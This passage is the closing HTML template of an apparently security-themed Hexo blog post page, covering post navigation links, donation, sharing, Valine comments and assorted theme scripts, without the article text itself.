      <img class="lazyload lazyload placeholder" src="/medias/1/14.jpg" class="lazyload placeholder" data-srcset="/medias/1/14.jpg" srcset="https://img2.baidu.com/it/u=2037979560,2772131037&fm=26&fmt=auto&gp=0.jpg" alt="">
    </div>
    <a href="/2022/04/30/laravel5-7-fan-xu-lie-hua/" class="post-nav-link">
      <div class="title">
        <i class="fas fa-angle-left"></i> 上一篇:
        <div class="title-text">laravel5.7反序列化</div>
      </div>
      
      <!-- <div class="content">
        前期准备&amp;参考资料composer相关：http:&#x2F;&#x2F;blog.unvs.cn&#x2F;a
      </div> -->
    </a>
  </div>



  
  <div class="post-nav-next post-nav-item">
    <div class="post-nav-img" style="background-size: cover; 
      background-position: center center;">
      <img class="lazyload lazyload placeholder" src="/medias/1/f-3.jpg" class="lazyload placeholder" data-srcset="/medias/1/f-3.jpg" srcset="https://img2.baidu.com/it/u=2037979560,2772131037&fm=26&fmt=auto&gp=0.jpg" src="" alt="">
    </div>
    <a href="/2022/04/24/wordpress-fen-xi/" class="post-nav-link">
      <div class="title">
        下一篇: <i class="fas fa-angle-right"></i>
        <div class="title-text">Wordpress分析</div>
      </div>
      <!-- <div class="content">
        写在前面wordpress学习信息主要来自HackTricks
基本信息Themes files can be foun
      </div> -->
    </a>
  </div>

</div>

    
    

    <!-- 打赏 -->
    
      <div id="appDonate" class="post-donate">
  <div id="donate_board" class="donate_bar center" ref="donate">
    <a id="btn_donate" class="btn_donate" href="javascript:;" title="打赏" @click="showDialogDrawer()"></a>
  </div>
  <transition name="fade">
    <div 
      class="donate-box-mask"
      v-cloak 
      v-show="visible"
      @click="cancelDialogDrawer()"
    >
    </div>
  </transition>
  <transition name="bounce">
    <div class="donate-box" v-cloak v-show="visible">
      <div class="donate-box_close">
        <i class="fas fa-times" aria-hidden="true" @click="cancelDialogDrawer" pointer></i>
      </div>
      <div class="donate-box_title">
        <h4>
          你的赏识是我前进的动力
        </h4>
      </div>
      <div class="donate-box_tab">
        <div class="Alipay" pointer :class="{'active': tabActive === 'Alipay'}" @click="changeTabActive('Alipay')">
          支付宝
        </div>
        <div class="WeChatpay" pointer :class="{'active': tabActive === 'WeChatpay'}" @click="changeTabActive('WeChatpay')">
          微信
        </div>
      </div>
      <div class="donate-box_img">
        <div class="AlipayImg" v-show="tabActive === 'Alipay'">
          <img src="/medias/b3.png" class="lazyload placeholder" data-srcset="/medias/b3.png" srcset="https://img2.baidu.com/it/u=2037979560,2772131037&fm=26&fmt=auto&gp=0.jpg" alt="支付宝打赏" />
        </div> 
        <div class="WeChatpayImg" v-show="tabActive === 'WeChatpay'">
          <img src="/medias/b3.png" class="lazyload placeholder" data-srcset="/medias/b3.png" srcset="https://img2.baidu.com/it/u=2037979560,2772131037&fm=26&fmt=auto&gp=0.jpg" alt="微信打赏" />
        </div>
      </div>
    </div>
  </transition>
</div>

<script>
  var body = document.body || document.documentElement || window;
  var vm = new Vue({
    el: '#appDonate',
    data: {
      visible: false,
      tabActive: 'Alipay',
      top: 0,
    },
    computed: {
    },
    mounted() {
    },
    methods: {
      showDialogDrawer() {
        this.visible = true;
        // 防止页面滚动，只能让弹框滚动
        // function getScroll() {
        //   return {
        //     left: window.pageXOffset || document.documentElement.scrollLeft || document.body.scrollLeft || 0,
        //     top: window.pageYOffset || document.documentElement.scrollTop || document.body.scrollTop || 0
        //   };
        // }
        this.top = $(document).scrollTop() // or getScroll().top
        // console.log('aa', $('.main-content'));
        body.style.cssText = 'overflow: hidden;';
      },
      cancelDialogDrawer() {
        this.visible = false;
        body.removeAttribute('style');
        $(document).scrollTop(this.top)
      },
      changeTabActive(name) {
        this.tabActive = name;
      }
    },
    created() {}
  })
</script>
    

    <!-- 分享 -->
    
      <!-- https://github.com/overtrue/share.js -->
<!-- 文章详情页的分享 -->
<div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>

<script src="/js/shareJs/social-share.min.js"></script>
</script>

<style>
  .social-share {
    margin: 20px 0;
  }
</style>


    
    
    <!-- 评论 -->
    <!-- 评论 -->

  <div id="myComment">
    
      
<section id="comments" style="padding: 1em; margin: 15px auto;"
	class="animated bounceInUp">
	<div id="vcomment" class="comment"></div>
</section>
<style>
	#comments {
		background: rgba(255,255,255,0.9);
	}
	#veditor {
		background-image: url('https://img.zcool.cn/community/01a253594c71cfa8012193a329a77f.gif');
		background-size: contain;
		background-repeat: no-repeat;
		background-position: right;
		background-color: rgba(255, 255, 255, 0);
		resize: vertical;
	}
	#veditor:focus{
		background-position-y: 200px;
		transition: all 0.2s ease-in-out 0s;
	}
	#vcomment .vcards .vcard .vh .vhead .vtag.vvisitor {
		background-color: #42b983;
	}
	.v[data-class=v] .vbtn:active, .v[data-class=v] .vbtn:hover {
		color: #42b983;
		border-color: #42b983;
	}
	#vcomment .vcards .vcard .vhead .vsys i {
		display: none;
	}
	/* 底部valine链接 */
	#vcomment .vpower {
		display: none;
	}
	
	/* 底下注释是修改 名称和邮箱和网址输入框的样式 */
	/* #vcomment .vheader {
		display: flex;
		justify-content: space-around;
	}
	
	#vcomment .vheader .vnick {
		width: 31%;
		border: 2px solid #dedede;
		padding-left: 10px;
		padding-right: 10px;
		border-radius: 5px
	}

	#vcomment .vheader .vmail {
		width: 31%;
		border: 2px solid #dedede;
		padding-left: 10px;
		padding-right: 10px;
		border-radius: 5px
	}

	#vcomment .vheader .vlink {
		width: 31%;
		border: 2px solid #dedede;
		padding-left: 10px;
		padding-right: 10px;
		border-radius: 5px
	} */

	img.vimg {
		transition: all 1s;
		/* 头像旋转时间为 1s */
	}

	img.vimg:hover {
		transform: rotate(360deg);
		-webkit-transform: rotate(360deg);
		-moz-transform: rotate(360deg);
		-o-transform: rotate(360deg);
		-ms-transform: rotate(360deg);
	}

	#vcomment .vcards .vcard {
		padding: 15px 20px 0 20px;
		border-radius: 10px;
		margin-bottom: 15px;
		box-shadow: 0 0 4px 1px rgba(0, 0, 0, .12);
		transition: all .3s
	}

	#vcomment .vcards .vcard:hover {
		box-shadow: 0 0 8px 3px rgba(0, 0, 0, .12)
	}

	#vcomment .vcards .vcard .vh .vcard {
		border: none;
		box-shadow: none;
	}
</style>
    
  </div>

<!-- comment script in themes\hexo-theme-bamboo\layout\_partial\scripts\index.ejs -->


  </div>

  <!-- 目录 -->
  <!-- 文章详情页右侧目录 -->

  <div class="toc-aside">
    <div class="toc-main">
      <div class="toc-aside-title">
        <i class="fas fa-list-ul" aria-hidden="true"></i><span>本文目录</span>
        
          <div class="toc-open-close">本文目录</div>
        
      </div>
      <div class="toc-content">
        <div class="toc"></div>
      </div>
    </div>
  </div>

  <!-- 手机端目录按钮 -->
  <div id="toc-mobile-btn">
    <i class="fas fa-list-ul" aria-hidden="true"></i>
  </div>


<script>
  function closeToc(init) {
    $(".toc-aside").css({'width': 0, 'padding': 0, 'transition': init ?  'noe' : 'width 0.3s' });
    $(".toc-content").css({'width': 0});
    $(".toc-aside-title span, .toc-aside-title i").css({'display': 'none'});
    $(".main-content").css({'width': '75%', 'margin': '10px auto'});
  };
  function openToc() {
    $(".main-content").css({'width': '65%', 'margin-right': '10px', 'margin-left': 'calc(35% - 350px)'});
    $(".toc-aside").css({'width': '300px', 'padding': '0 10px', 'transition': 'width 0.3s'});
    $(".toc-content").css({'width': '300px'});
    $(".toc-aside-title span, .toc-aside-title i").css({'display': 'inline-block'});
  }
  function openBtnClickFn () {
    let openOrCloseBtn = $('.toc-aside .toc-aside-title .toc-open-close');
    let open = eval('' || 'true');
    openOrCloseBtn.click(function() {
      if (open) {
        closeToc();
        open = false;
      } else {
        openToc();
        open = true;
      }
    });
  };
  openBtnClickFn();
  initCloseTocWidth(true);

  function initCloseTocWidth(init) {
    if (window.innerWidth >= 992) {
      let isClose = false;
      isClose && closeToc(init)
    }
  }

  document.addEventListener('pjax:complete', function () {
    $(".toc-aside").css({'transition': 'no'});
  })
  document.addEventListener('pjax:complete', function () {
    openBtnClickFn();
  })
  
</script>

  <!-- 图片放大 Wrap images with fancybox support -->
  <script src="/js/wrapImage.js"></script>
</div>

<!-- 文章详情页背景图 -->
<div id="appBgSwiper" style="position: fixed;left: 0;top: 0;width: 100%;height: 100%;z-index: -2;"
	:style="{'background-color': bgColor ? bgColor : 'transparent'}">
	<transition-group tag="ul" :name="names">
		<li v-for='(image,index) in img' :key='index' v-show="index === mark" class="bg-swiper-box">
			<img :src="image" class="bg-swiper-img no-lazy">
		</li>
	</transition-group>
</div>
<script>
	var vm = new Vue({
		el: '#appBgSwiper',
		data: {
			names: '' || 'fade' || 'fade', // translate-fade fade
			mark: 0,
			img: [],
			bgColor: '',
			time: null
		},
		methods: {   //添加方法
			change(i, m) {
				if (i > m) {
					// this.names = 'fade';
				} else if (i < m) {
					// this.names = 'fade';
				} else {
					return;
				}
				this.mark = i;
			},
			prev() {
				// this.names = 'fade';
				this.mark--;
				if (this.mark === -1) {
					this.mark = 3;
					return
				}
			},
			next() {
				// this.names = 'fade';
				this.mark++;
				if (this.mark === this.img.length) {
					this.mark = 0;
					return
				}
			},
			autoPlay() {
				// this.names = 'fade';
				this.mark++;
				if (this.mark === this.img.length) {
					this.mark = 0;
					return
				}
			},
			play() {
				let bgImgDelay = '' || '180000'
				let delay = parseInt(bgImgDelay) || 180000;
				this.time = setInterval(this.autoPlay, delay);
			},
			enter() {
				clearInterval(this.time);
			},
			leave() {
				this.play();
			}
		},
		created() {
			this.play()
		},
		beforeDestroy() {
			clearInterval(this.time);
		},
		mounted() {
			let prop = '' || '';
			let isImg = prop.includes('.bmp') || prop.includes('.jpg') || prop.includes('.png') || prop.includes('.tif') || prop.includes('.gif') || prop.includes('.pcx') || prop.includes('.tga') || prop.includes('.exif') || prop.includes('.fpx') || prop.includes('.psd') || prop.includes('.cdr') || prop.includes('.pcd') || prop.includes('.dxf') || prop.includes('.ufo') || prop.includes('.eps') || prop.includes('.ai') || prop.includes('.raw') || prop.includes('.WMF') || prop.includes('.webp') || prop.includes('.jpeg') || prop.includes('http://') || prop.includes('https://')
			if (isImg) {
				let img = prop.split(',');
				let configRoot = '/'
				let arrImg = [];
				img.forEach(el => {
					var Expression = /http(s)?:\/\/([\w-]+\.)+[\w-]+(\/[\w- .\/?%&=]*)?/;
					var objExp = new RegExp(Expression);

					if (objExp.test(el)) {
						// http or https
						arrImg.push(el);
					} else {
						// 非http or https开头
						// 本地文件
						let firstStr = el.charAt(0);
						if (firstStr == '/') {
							el = el.substr(1); // 删除第一个字符 '/',因为 configRoot最后一个字符为 /
						}
						el = configRoot + el;
						arrImg.push(el);
					}
				})
				this.img = arrImg;
			} else {
				this.bgColor = prop;
			}
		}
	})
</script>

<style>
	.bg-swiper-box {
		position: absolute;
		display: block;
		width: 100%;
		height: 100%;
	}

	.bg-swiper-img {
		object-fit: cover;
		width: 100%;
		height: 100%;
	}
</style>




  <script>
  function loadMermaid() {
    if (document.getElementsByClassName('mermaid').length) {
      if (window.mermaidJsLoad) mermaid.init()
      else {
        loadScript('https://cdn.jsdelivr.net/npm/mermaid/dist/mermaid.min.js').then(() => {
          window.mermaidJsLoad = true
          mermaid.initialize({
            theme: 'default',
          })
          if ('true') {
            mermaid.init();
          }
        })
      }
    }
  };
  document.addEventListener("DOMContentLoaded", function () {
    loadMermaid();
  })

  document.addEventListener('pjax:complete', function () {
    loadMermaid();
  })
  
</script>


      </main>
    </div>

    <!-- 页脚 -->
    
  
  <div class="footer bg-color">
    <div class="footer-main">
      
        
          <div class="link">
            
          </div>
        
      
        
          <div class="footer-copyright">
            <p>Copyright © 2022-2023 <a target="_blank" rel="noopener" href="https://github.com/Sakura-501">Sakura501</a> | Powered by <a target="_blank" rel="noopener" href="https://hexo.io/zh-cn/docs/">Hexo</a> | Theme <a target="_blank" rel="noopener" href="https://github.com/yuang01/theme">Bamboo</a> </p>

          </div>
        
      
        
          <div class="footer-custom">
            
          </div>
        
      
    </div>
  </div>



    <!-- 渲染暗黑按钮 -->
    
      <div class="dark">
  <div class="dark-content">
    <i class="fas fa-moon" aria-hidden="true"></i>
    <!-- <span>关灯</span> -->
  </div>
  
</div>

<script>
  $(function() {
    let isDark = JSON.parse(localStorage.getItem('dark'))  || JSON.parse('false');
    if (isDark) {
      $(".dark-content").replaceWith(
          `
          <div class='dark-content'>
            <i class="fas fa-lightbulb" aria-hidden="true"></i>
          </div>
          `
        );
    }
    $('.dark').click(function() {
      if ($(document.body).is('.darkModel')) {
        $(document.body).removeClass('darkModel');
        localStorage.setItem('dark', false);
        $(".dark-content").replaceWith(
          `
          <div class='dark-content'>
            <i class="fas fa-moon" aria-hidden="true"></i>
          </div>
          `
        );
      } else {
        $(document.body).addClass('darkModel');
        localStorage.setItem('dark', true);
        $(".dark-content").replaceWith(
          `
          <div class='dark-content'>
            <i class="fas fa-lightbulb" aria-hidden="true"></i>
          </div>
          `
        );
      }
    })
  })
</script>
    
    <!-- 渲染回到顶部按钮 -->
    
      <div class="goTop top-btn-color" pointer>
  <i class="fas fa-arrow-up" aria-hidden="true"></i>
</div>
<script src="/js/goTop.js"></script>

    
    <!-- 渲染左下角音乐播放器 -->
    
      <link rel="stylesheet" href="/js/aplayer/APlayer@1.10.1.min.css">
<style>
.aplayer .aplayer-lrc p {
  
  font-size: 12px;
  font-weight: 700;
  line-height: 16px !important;
}

.aplayer .aplayer-lrc p.aplayer-lrc-current {
  
  font-size: 15px;
  color: #42b983;
}


.aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
  left: -66px !important;
}

.aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
  left: 0px !important;
}


</style>
<meting-js  
  class=""
  server="tencent"
  type="album"
  id="000bya7h2MeHnm"
  fixed='true'
  autoplay='true'
  theme='#42b983'
  loop='all'
  order='random'
  preload='auto'
  volume='0.7'
  list-folded='true'
>
</meting-js>

<!-- <style>
  #aplayer {
    position: fixed;
    left: 0;
    bottom: 300px;
  }
</style> -->
<script src="https://cdn.jsdelivr.net/npm/aplayer@1.10.1/dist/APlayer.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/meting@2/dist/Meting.min.js"></script>
    

    <!-- 图片放大 -->
    
      <script src="/js/fancybox/jquery.fancybox.min.js"></script>
    

    <!-- 百度解析 -->
    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <!-- 背景彩带 -->
    
      <script type="text/javascript" size="100" alpha='0.4' zIndex="-1" src="/js/ribbon.min.js"></script>
    

    <script src="/js/utils/index.js"></script>
    <script src="/js/app.js"></script>
    
    <!-- 文章目录所需js -->
<link href="/js/tocbot/tocbot.css" rel="stylesheet">
<script src="/js/tocbot/tocbot.min.js"></script>

<script>
  var headerEl = 'h2, h3, h4',  //headers 
    content = '.post-detail',//文章容器
    idArr = {};  //标题数组以确定是否增加索引id
  //add #id
  var option = {
    // Where to render the table of contents.
    tocSelector: '.toc',
    // Where to grab the headings to build the table of contents.
    contentSelector: content,
    // Which headings to grab inside of the contentSelector element.
    headingSelector: headerEl,
    scrollSmooth: true,
    scrollSmoothOffset: -80,
    headingsOffset: -($(window).height() * 0.4 - 45),
    positionFixedSelector: '.toc-main',
    positionFixedClass: 'is-position-fixed',
    fixedSidebarOffset: 'auto',
    activeLinkClass: 'is-active-link',
    // onClick: function (e) {},
  }
  if ($('.toc').length > 0) {

    $(content).children(headerEl).each(function () {
      //去除空格以及多余标点
      var headerId = $(this).text().replace(/[\s|\~|`|\!|\@|\#|\$|\%|\^|\&|\*|\(|\)|\_|\+|\=|\||\|\[|\]|\{|\}|\;|\:|\"|\'|\,|\<|\.|\>|\/|\?|\：|\，|\。]/g, '');

      headerId = headerId.toLowerCase();
      if (idArr[headerId]) {
        //id已经存在
        $(this).attr('id', headerId + '-' + idArr[headerId]);
        idArr[headerId]++;
      }
      else {
        //id未存在
        idArr[headerId] = 1;
        $(this).attr('id', headerId);
      }
    });

    document.addEventListener("DOMContentLoaded", function () {
      tocbot.init(option);
      mobileTocClick();
    });

  }

  window.tocScrollFn = function () {
    return bamboo.throttle(function () {
      findHeadPosition();
    }, 100)()
  }
  window.addEventListener('scroll', tocScrollFn);

  const findHeadPosition = function (top) {
    if ($('.toc-list').length <= 0) {
      return false;
    }
    setTimeout(() => {  // or DOMContentLoaded 
      autoScrollToc();
    }, 0);
  }

  const autoScrollToc = function () {
    const $activeItem = document.querySelector('.is-active-link');
    const $cardToc = document.querySelector('.toc-content');
    const activePosition = $activeItem.getBoundingClientRect().top
    const sidebarScrollTop = $cardToc.scrollTop
    if (activePosition > (document.documentElement.clientHeight - 100)) {
      $cardToc.scrollTop = sidebarScrollTop + 150
    }
    if (activePosition < 100) {
      $cardToc.scrollTop = sidebarScrollTop - 150
    }
  }

  document.addEventListener('pjax:send', function () {
    if ($('.toc').length) {
      tocbot.destroy();
    }
  });

  document.addEventListener('pjax:complete', function () {
    if ($('.toc').length) {
      tocbot.init(option);
      mobileTocClick();
    }
  });
  
  // 手机端toc按钮点击出现目录
  const mobileTocClick = function () {
    const $cardTocLayout = document.getElementsByClassName('toc-aside')[0];
    const $cardToc = $cardTocLayout.getElementsByClassName('toc-content')[0];
    let right = '45px';
    if (window.innerWidth >= 551 && window.innerWidth <= 992) {
      right = '100px'
    }
    const mobileToc = {
      open: () => {
        $cardTocLayout.style.cssText = 'animation: toc-open .3s; opacity: 1; right: ' + right
      },

      close: () => {
        $cardTocLayout.style.animation = 'toc-close .2s'
        setTimeout(() => {
          $cardTocLayout.style.cssText = "opacity:''; animation: ''; right: ''"
        }, 100)
      }
    }
    document.getElementById('toc-mobile-btn').addEventListener('click', () => {
      if (window.getComputedStyle($cardTocLayout).getPropertyValue('opacity') === '0') mobileToc.open()
      else mobileToc.close()
    })

    $cardToc.addEventListener('click', (e) => {
      if (window.innerWidth < 992) { // 小于992px的时候
        mobileToc.close()
      }
    })
  }
</script>

<style>
  .is-position-fixed {
    position: sticky !important;
    top: 74px;
  }

  .toc-main ul {
    counter-reset: show-list;
  }

  .toc-main ul li::before {
    content: counter(item)".";
    display: block;
    position: absolute;
    left: 12px;
    top: 0;
  }
</style> 

<!-- 设置导航背景 -->
<script>
  let setHeaderClass = () => {
    const headerMenuTransparent = true;
    if (!headerMenuTransparent) { return; }
    const nav = $('#navHeader');
    const navTop = nav.outerHeight();
    const winTop = $(window).scrollTop();
    if(winTop > navTop) {
      nav.addClass('header-bg-color');
    }
    else {
      nav.removeClass('header-bg-color');
    }
  };

  let scrollCollect = () => {
    return bamboo.throttle(function (e) {
      setHeaderClass();
    }, 200)()
  }

  let initHeaderBg = () => {
    setHeaderClass();
  }

  setHeaderClass();
  window.addEventListener('scroll', scrollCollect);

  document.addEventListener('pjax:send', function () {
    window.removeEventListener('scroll', scrollCollect)
  })
  document.addEventListener('pjax:complete', function () {
    window.addEventListener('scroll', scrollCollect);
    setHeaderClass();
  })
</script> 

<!-- 渲染issues标签里的内容 -->
<script>
  function loadIssuesJS() {
    if ($(".post-detail").find(".issues-api").length == 0) {
      return;
    } 
    loadScript('/js/issues/index.js');
  };
  $(function () {
    loadIssuesJS();
  });
  document.addEventListener('pjax:complete', function () {
    if (typeof IssuesAPI == "undefined") {
      loadIssuesJS();
    }
  })
</script>

<!-- 输入框打字特效 -->
<!-- 输入框打字特效 -->

  <script src="/js/activate-power-mode.js"></script>
  <script>
    POWERMODE.colorful = true;  // 打开随机颜色特效
    POWERMODE.shake = false;    // 关闭输入框抖动
    document.body.addEventListener('input', POWERMODE);//监听打字事件
  </script>


<!-- markdown代码一键复制功能 -->

  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/v-plugs-ayu/lib/ayu.css">
  <script src="https://cdn.jsdelivr.net/npm/v-plugs-ayu/lib/ayu.umd.min.js"></script>
  <script src="/js/clipboard/clipboard.min.js"></script>
  <div id="appCopy">
  </div>
  <script data-pjax>
    var vm = new Vue({
      el: '#appCopy',
      data: {
      },
      computed: {
      },
      mounted() {
        const that = this;
        var copy = '复制';
        /* code */
        var initCopyCode = function () {
          var copyHtml = '';
          copyHtml += '<button class="btn-copy" data-clipboard-snippet="" style="position:absolute;top:0;right:0;z-index:1;">';
          copyHtml += '<i class="fas fa-copy"></i><span>' + copy + '</span>';
          copyHtml += '</button>';
          $(".post-detail pre").not('.gutter pre').wrap("<div class='codeBox' style='position:relative;width:100%;'></div>")
          $(".post-detail pre").not('.gutter pre').before(copyHtml);
          new ClipboardJS('.btn-copy', {
            target: function (trigger) {
              return trigger.nextElementSibling;
            }
          });
        }
        initCopyCode();
        $('.btn-copy').unbind('click').bind('click', function () {
          doSomething();
        })
        $(document).unbind('keypress').bind('keypress', function (e) {
          if (e.ctrlKey && e.keyCode == 67) {
            doSomething();
          }
        })

        function doSomething() {
          that.$notify({
            title: "成功",
            content: "代码已复制，请遵守相关授权协议。",
            type: 'success'
          })
        }
      },
      methods: {
      },
      created() { }
    })
  </script>
  

<!-- 图片懒加载 -->
<script defer src="https://cdn.jsdelivr.net/npm/vanilla-lazyload@17.1.0/dist/lazyload.min.js"></script>
<script>
  // https://www.npmjs.com/package/vanilla-lazyload
  // Set the options globally
  // to make LazyLoad self-initialize
  window.lazyLoadOptions = {
    elements_selector: ".lazyload",
    threshold: 0
  };
  // Listen to the initialization event
  // and get the instance of LazyLoad
  window.addEventListener(
    "LazyLoad::Initialized",
    function (event) {
      window.lazyLoadInstance = event.detail.instance;
    },
    false
  );
  document.addEventListener('DOMContentLoaded', function () {
    lazyLoadInstance.update();
  });
  document.addEventListener('pjax:complete', function () {
    lazyLoadInstance.update();
  });
</script>


<!-- 卡片滚动动画 -->

    <script type="text/javascript">
  loadScript("https://cdn.jsdelivr.net/npm/scrollreveal@4.0.6/dist/scrollreveal.min.js")
  function pjax_scrollrebeal() {
    ScrollReveal().reveal('.reveal', {
      distance: '120px',
      duration: '400',
      interval: '30',
      scale: '1',
      origin: 'bottom', // 动画开始的方向
      easing: 'ease'
    });
  }
  $(function () {
    var checkScrollReveal = setInterval(function () {
      if ($("#safearea").css("display") != "block") return
      if (typeof ScrollReveal == "undefined") return
      clearInterval(checkScrollReveal)
      pjax_scrollrebeal();
    }, 100)
  });
  document.addEventListener('pjax:complete', function () {
    pjax_scrollrebeal();
  })
</script>
   

<!-- 评论所需js -->

  
    <!-- 弹幕所需的css和js -->
    
<!-- 具体js，请前往valine/script.ejs查看 -->

    <script>
  var requiredFields = 'nick';
  requiredFields = requiredFields.split(',');
  comment_el = '.comment';
  let looperValine = null;
  load_valine = function () {
    if ($(comment_el).length) {
      var valine = new Valine({
        el: '#vcomment',
        path: window.location.pathname,
        notify: false,
        verify: false,
        app_id: "0f8DdpqPk0GUk3z0yTDoKfwT-gzGzoHsz",
        app_key: "frynOsI28P1JEmpdCWKQr8Pk",
        placeholder: "客官，说点什么吧",
        avatar: "https://valine.js.org/avatar.html",
        master: "",   //博主邮箱md5
        tagMeta: ["博主","小伙伴","访客"],     //标识字段名
        friends: "",
        metaPlaceholder: { "nick": "昵称/QQ号", "mail": "邮箱" },
        requiredFields: requiredFields,
        enableQQ: true,
      });
      function debounce(fn) {
        var timerID = null
        return function () {
          var arg = arguments[0]   //获取事件
          if (timerID) {
            clearTimeout(timerID)
          }
          timerID = setTimeout(function () {
            fn(arg)              //事件传入函数
          }, 200)
        }
      }
      //查询评论 valine.Q('*').limit(7) -- 查询所有，限制7条, 下面的的代码是查询当前页面
      var themeDanmu = eval('false');
      var themeLoop = eval('false');
      var themeLooperTime = '5000' || 5000;
      var speed = '40' || 20;
      var isBarrager = true;
      if (themeDanmu == true) {
        do_barrager();
        if ($('.danmuBox').length <= 0) {
          $('.navbar').append('<div class="danmuBox"><div class="danmuBtn open"><span class="danmuCircle"></span><span class="danmuText">弹幕</span></div></div>');
        }
        $('.danmuBtn').on('click', debounce(
          function () {
            if ($('.danmuBtn').hasClass('open')) {
              $('.danmuBtn').removeClass('open')
              clearInterval(looperValine);
              $.fn.barrager.removeAll();
            } else {
              $('.danmuBtn').addClass("open");
              do_barrager();
            }
          }
        ))
      }
      function do_barrager() {
        isBarrager && valine.Q(window.location.pathname).find().then(function (comments) {
          // var num = 0; // 可以记录条数，循环调用的时候只取最新的评论放入弹幕中
          var run_once = true;
          var looper_time = themeLooperTime;
          var total = comments.length;
          // var looper = null;
          var index = 0;
          if (total > 0) {
            barrager();
          } else {
            // 当评论数为0的时候，自动关闭弹幕
            // $('.danmuBtn').removeClass('open');
          }
          function barrager() {
            if (run_once) {
              //如果是首次执行,则设置一个定时器,并且把首次执行置为false
              looperValine = setInterval(barrager, looper_time);
              run_once = false;
            }
            var content = comments[index]._serverData.comment;
            var email = comments[index]._serverData.mail;
            var link = comments[index]._serverData.link;
            var newcontent = content.substring(0, 50).replace(/<[^>]+>/g, "");
            //发布一个弹幕
            const item = {
              img: `https://q1.qlogo.cn/g?b=qq&nk=${email}&s=640`, //图片 
              info: newcontent, //文字 
              href: link, //链接 
              close: true, //显示关闭按钮 
              speed: speed, //延迟,单位秒,默认6 
              color: '#fff', //颜色,默认白色 
              old_ie_color: '#000000', //ie低版兼容色,不能与网页背景相同,默认黑色
            }
            $('body').barrager(item);
            //索引自增
            index++;
            //所有弹幕发布完毕，清除计时器。
            if (index == total) {
              clearInterval(looperValine);
              if (themeLoop === true) {
                setTimeout(function () {
                  do_barrager();
                }, 5000);
              } else {
                $('.danmuBtn').removeClass('open');
              }
              return false;
            }

          }
        })
      }
    }
  };
  $(document).ready(load_valine);
  document.addEventListener('pjax:send', function (e) {
    
  })
  document.addEventListener('pjax:complete', function () {
    load_valine();
  });
</script>

  


<!-- 鼠标点击特效 -->
<!-- 爱心点击 -->

   
    <script src="/js/cursor/clicklove.js"></script> 
  




  <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" data-pjax></script>


    <!-- pjax -->
    

<!-- pjax -->


  <script src="/js/pjax@0.2.8/index.js"></script>
  
    <!-- 样式位于：source/css/_third-party/pjaxanimate.styl -->

<div class="pjax-animate">
  
    <div class="loading-circle"><div id="loader-circle"></div></div>
    <script>
      window.ShowLoading = function() {
        $(".loading-circle").css("display", "block");
      };
      window.HideLoading = function() {
        $(".loading-circle").css("display", "none");
      }
    </script>
  
	<script>
    document.addEventListener('pjax:complete', function () {
      window.HideLoading();
    })
    document.addEventListener('pjax:send', function () {
      window.ShowLoading();
    })
    document.addEventListener('pjax:error', function () {
      window.HideLoading();
    })
	</script>
</div>

  

  <script>
    var pjax = new Pjax({
      elements: 'a[href]:not([href^="#"]):not([href="javascript:void(0)"]):not([no-pjax])',   // 拦截正常带链接的 a 标签
      selectors: ["#pjax-container","title"],                                   // 根据实际需要确认重载区域
      cacheBust: false,   // url 地址追加时间戳，用以避免浏览器缓存
      timeout: 5000
    });

    document.addEventListener('pjax:send', function (e) {

      try {
        var currentUrl = window.location.pathname;
        var targetUrl = e.triggerElement.href;
        var banUrl = [""];
        if (banUrl[0] != "") {
          banUrl.forEach(item => {
            if(currentUrl.indexOf(item) != -1 || targetUrl.indexOf(item) != -1) {
              window.location.href = targetUrl;
            }
          });
        }
      } catch (error) {}

      $(window).unbind('resize');
      $(window).unbind('scroll');
      $(document).unbind('scroll');
      $(document).unbind('click');
      $('body').unbind('click');

    })
    
    document.addEventListener('pjax:complete', function () {
      $('script[data-pjax], .pjax-reload script').each(function () {
        $(this).parent().append($(this).remove());
      });
    });

    document.addEventListener('pjax:error', function (e) {
      window.location.href = e.triggerElement.href;
    })
    
    // 刷新不从顶部开始
    document.addEventListener("DOMContentLoaded", function () {
      history.scrollRestoration = 'auto';
    })
  </script>



  </body>
</html>